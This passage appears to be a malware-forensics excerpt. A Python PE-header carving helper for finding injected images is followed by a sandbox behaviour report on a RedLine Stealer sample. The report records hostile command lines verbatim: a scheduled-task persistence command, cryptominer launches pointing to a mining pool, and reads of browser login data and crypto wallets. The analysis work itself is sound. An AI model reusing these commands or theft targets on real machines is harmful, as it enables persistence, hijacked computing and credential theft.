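        addr = region_base + off
        module = next((name for base, size, name in loaded_modules
                       if base <= addr < base + size), None)
        hits.append({
            "address": addr,
            "arch": MACHINES.get(machine, hex(machine)),
            "kind": "DLL" if chars & IMAGE_FILE_DLL else "EXE",
            "sections": nsections,
            "image_base": image_base,
            "size_of_image": size_of_image,     # how many bytes to dump from 'address'
            "relocated": image_base != addr,    # mapped away from its preferred base
            "module": module,                   # None: not in the module list, i.e. injected
        })
    return hits


def fake_pe_header(is64: bool, image_base: int, size_of_image: int, dll: bool = False) -> bytes:
    """Constructed fixture: DOS stub, PE signature, COFF and optional header only."""
    hdr = bytearray(0x40 + 4 + 20 + 240)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x8664 if is64 else 0x14C, 1, 0, 0, 0,
                     240 if is64 else 224, 0x2002 if dll else 0x0002)
    opt = 0x58
    struct.pack_into("<H", hdr, opt, 0x20B if is64 else 0x10B)
    if is64:
        struct.pack_into("<Q", hdr, opt + 24, image_base)
    else:
        struct.pack_into("<I", hdr, opt + 28, image_base)
    struct.pack_into("<I", hdr, opt + 56, size_of_image)
    return bytes(hdr)


if __name__ == "__main__":
    # Constructed region: an x64 EXE header at its preferred base, then a junk page,
    # then the same header again one page further on (relocated copy).
    img = fake_pe_header(True, 0x140000000, 0x780000)
    region = img.ljust(PAGE, b"\0") + b"\x90" * PAGE + img
    for hit in carve_pe_headers(region, 0x140000000,
                                [(0x7FF600000000, 0x100000, "explorer.exe")]):
        print(f"{hit['address']:#x} {hit['arch']} {hit['kind']} base={hit['image_base']:#x} "
              f"size={hit['size_of_image']:#x} relocated={hit['relocated']} module={hit['module']}")
```

The `module` field is the discriminator: a legitimately loaded DLL also has an MZ header at a page-aligned address, but it sits inside a module-list entry whose name you can check against disk. A hit with `module` None, like the one at 0x140000000 in explorer.exe here, is the injected image, and `size_of_image` bytes from `address` is what to dump for further analysis. The `relocated` flag is a weaker hint only, since ASLR relocates almost every modern image, but an EXE sitting exactly at its preferred base inside another process is itself unusual and is what the report's addresses show.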
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe  Thread created: C:\Windows\System32\conhost.exe EIP: F37B0000
Source: C:\Users\user\AppData\Local\Temp\services64.exe  Thread created: C:\Windows\System32\conhost.exe EIP: F1F70000
Source: C:\Users\user\AppData\Local\Temp\services64.exe  Thread created: C:\Windows\System32\conhost.exe EIP: D5930000
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe  Thread created: C:\Windows\System32\conhost.exe EIP: 9A6F0000
Writes to foreign memory regions
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000
Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: D3B008
Source: C:\Users\user\AppData\Local\Temp\sistem.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\sistem.exe  Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: F18008
Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe  Memory written: C:\Windows\System32\conhost.exe base: 1B0F37B0000
Source: C:\Users\user\AppData\Local\Temp\services64.exe  Memory written: C:\Windows\System32\conhost.exe base: 201F1F70000
Source: C:\Windows\System32\conhost.exe  Memory written: C:\Windows\explorer.exe base: 140000000
Source: C:\Windows\System32\conhost.exe  Memory written: C:\Windows\explorer.exe base: 140001000
Source: C:\Windows\System32\conhost.exe  Memory written: C:\Windows\explorer.exe base: 140367000
Source: C:\Windows\System32\conhost.exe  Memory written: C:\Windows\explorer.exe base: 1404A0000
Source: C:\Windows\System32\conhost.exe  Memory written: C:\Windows\explorer.exe base: 140753000
Source: C:\Windows\System32\conhost.exe  Memory written: C:\Windows\explorer.exe base: 140775000
Source: C:\Windows\System32\conhost.exe  Memory written: C:\Windows\explorer.exe base: 140776000
Source: C:\Windows\System32\conhost.exe  Memory written: C:\Windows\explorer.exe base: 140777000
Source: C:\Windows\System32\conhost.exe  Memory written: C:\Windows\explorer.exe base: 140779000
Source: C:\Windows\System32\conhost.exe  Memory written: C:\Windows\explorer.exe base: 14077B000
Source: C:\Windows\System32\conhost.exe  Memory written: C:\Windows\explorer.exe base: 14077C000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077D000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 2E2010
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeMemory written: C:\Windows\System32\conhost.exe base: 224D5930000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140000000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140001000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140367000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 1404A0000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140753000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140775000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140776000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140777000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 140779000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077B000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077C000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 14077D000
                  Source: C:\Windows\System32\conhost.exeMemory written: C:\Windows\explorer.exe base: 10FF010
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeMemory written: C:\Windows\System32\conhost.exe base: 25F9A6F0000
                  Injects code into the Windows Explorer (explorer.exe)Show sources
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 140000000 value: 4D
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 140001000 value: 48
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 140367000 value: 1E
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 1404A0000 value: F0
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 140753000 value: 00
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 140775000 value: 48
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 140776000 value: C5
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 140777000 value: 48
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 140779000 value: 48
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 14077B000 value: 60
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 14077C000 value: 00
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 14077D000 value: 00
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 6924 base: 2E2010 value: 00
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 140000000 value: 4D
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 140001000 value: 48
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 140367000 value: 1E
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 1404A0000 value: F0
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 140753000 value: 00
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 140775000 value: 48
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 140776000 value: C5
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 140777000 value: 48
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 140779000 value: 48
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 14077B000 value: 60
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 14077C000 value: 00
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 14077D000 value: 00
                  Source: C:\Windows\System32\conhost.exeMemory written: PID: 4876 base: 10FF010 value: 00
                  Modifies the context of a thread in another process (thread injection)Show sources
                  Source: C:\Windows\System32\conhost.exeThread register set: target process: 6924
                  Source: C:\Windows\System32\conhost.exeThread register set: target process: 4876
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Users\user\AppData\Local\Temp\sistem.exe "C:\Users\user\AppData\Local\Temp\sistem.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft.exe "C:\Users\user\AppData\Local\Temp\Microsoft.exe"
                  Source: C:\Users\user\AppData\Local\Temp\sistem.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\Microsoft.exe
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
                  Source: C:\Users\user\AppData\Local\Temp\services64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\cmd.exe cmd" cmd /c taskkill /f /PID "6040
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "/sihost64
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /PID "6040"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /PID "6040"
                  Source: AppLaunch.exe, 00000009.00000002.925344294.0000000005B70000.00000002.00020000.sdmp, conhost.exe, 0000000B.00000000.734467496.000001B0F4230000.00000002.00020000.sdmp, conhost.exe, 00000011.00000000.748949559.00000201F2970000.00000002.00020000.sdmp, conhost.exe, 00000015.00000000.752313076.00000224D63E0000.00000002.00020000.sdmp, conhost.exe, 00000017.00000000.757912065.0000025F9AE60000.00000002.00020000.sdmpBinary or memory string: Program Manager
                  Source: AppLaunch.exe, 00000009.00000002.925344294.0000000005B70000.00000002.00020000.sdmp, conhost.exe, 0000000B.00000000.734467496.000001B0F4230000.00000002.00020000.sdmp, conhost.exe, 00000011.00000000.748949559.00000201F2970000.00000002.00020000.sdmp, conhost.exe, 00000015.00000000.752313076.00000224D63E0000.00000002.00020000.sdmp, conhost.exe, 00000017.00000000.757912065.0000025F9AE60000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: AppLaunch.exe, 00000009.00000002.925344294.0000000005B70000.00000002.00020000.sdmp, conhost.exe, 0000000B.00000000.734467496.000001B0F4230000.00000002.00020000.sdmp, conhost.exe, 00000011.00000000.748949559.00000201F2970000.00000002.00020000.sdmp, conhost.exe, 00000015.00000000.752313076.00000224D63E0000.00000002.00020000.sdmp, conhost.exe, 00000017.00000000.757912065.0000025F9AE60000.00000002.00020000.sdmpBinary or memory string: Progman
                  Source: AppLaunch.exe, 00000009.00000002.925344294.0000000005B70000.00000002.00020000.sdmp, conhost.exe, 0000000B.00000000.734467496.000001B0F4230000.00000002.00020000.sdmp, conhost.exe, 00000011.00000000.748949559.00000201F2970000.00000002.00020000.sdmp, conhost.exe, 00000015.00000000.752313076.00000224D63E0000.00000002.00020000.sdmp, conhost.exe, 00000017.00000000.757912065.0000025F9AE60000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                  Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: C:\Windows\explorer.exeCode function: 27_2_000000014031010C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                  Stealing of Sensitive Information:

                  Yara detected RedLine Stealer
                  Source: Yara match | File source: 0.2.982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe.c3b50.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.3.982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe.36f0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.731135586.0000000000402000.00000020.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.655906687.00000000036F2000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: AppLaunch.exe PID: 5180, type: MEMORYSTR
                  Source: Yara match | File source: dump.pcap, type: PCAP
                  Yara detected Redline Clipper
                  Source: Yara match | File source: 9.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 8.2.sistem.exe.be970.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 8.3.sistem.exe.2910000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000008.00000002.725269917.00000000000BD000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000008.00000003.724529883.0000000002912000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000009.00000002.917454053.0000000000402000.00000020.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: sistem.exe PID: 5576, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: AppLaunch.exe PID: 7016, type: MEMORYSTR
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                  Source: Yara match | File source: 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: AppLaunch.exe PID: 5180, type: MEMORYSTR

                  Remote Access Functionality:

                  Yara detected RedLine Stealer
                  Source: Yara match | File source: 0.2.982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe.c3b50.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 1.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.3.982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe.36f0000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000001.00000002.731135586.0000000000402000.00000020.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000003.655906687.00000000036F2000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: AppLaunch.exe PID: 5180, type: MEMORYSTR
                  Source: Yara match | File source: dump.pcap, type: PCAP

                  Mitre Att&ck Matrix

                  Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                  Valid Accounts | Windows Management Instrumentation 221 | Windows Service 1 | Windows Service 1 | Disable or Modify Tools 11 | OS Credential Dumping 1 | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                  Default Accounts | Command and Scripting Interpreter 12 | Scheduled Task/Job 1 | Process Injection 712 | Obfuscated Files or Information 2 | Input Capture 1 | File and Directory Discovery 1 | Remote Desktop Protocol | Data from Local System 2 | Exfiltration Over Bluetooth | Encrypted Channel 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                  Domain Accounts | Scheduled Task/Job 1 | Logon Script (Windows) | Scheduled Task/Job 1 | Software Packing 2 | Security Account Manager | System Information Discovery 124 | SMB/Windows Admin Shares | Input Capture 1 | Automated Exfiltration | Non-Standard Port 11 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                  Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Masquerading 1 | NTDS | Security Software Discovery 421 | Distributed Component Object Model | Clipboard Data 1 | Scheduled Transfer | Non-Application Layer Protocol 2 | SIM Card Swap | | Carrier Billing Fraud
                  Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion 331 | LSA Secrets | Process Discovery 12 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol 12 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                  Replication Through Removable Media | Launchd | Rc.common | Rc.common | Process Injection 712 | Cached Domain Credentials | Virtualization/Sandbox Evasion 331 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                  External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | Application Window Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                  Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Remote System Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

                  Behavior Graph

                  Legend:

                  • Process
                  • Signature
                  • Created File
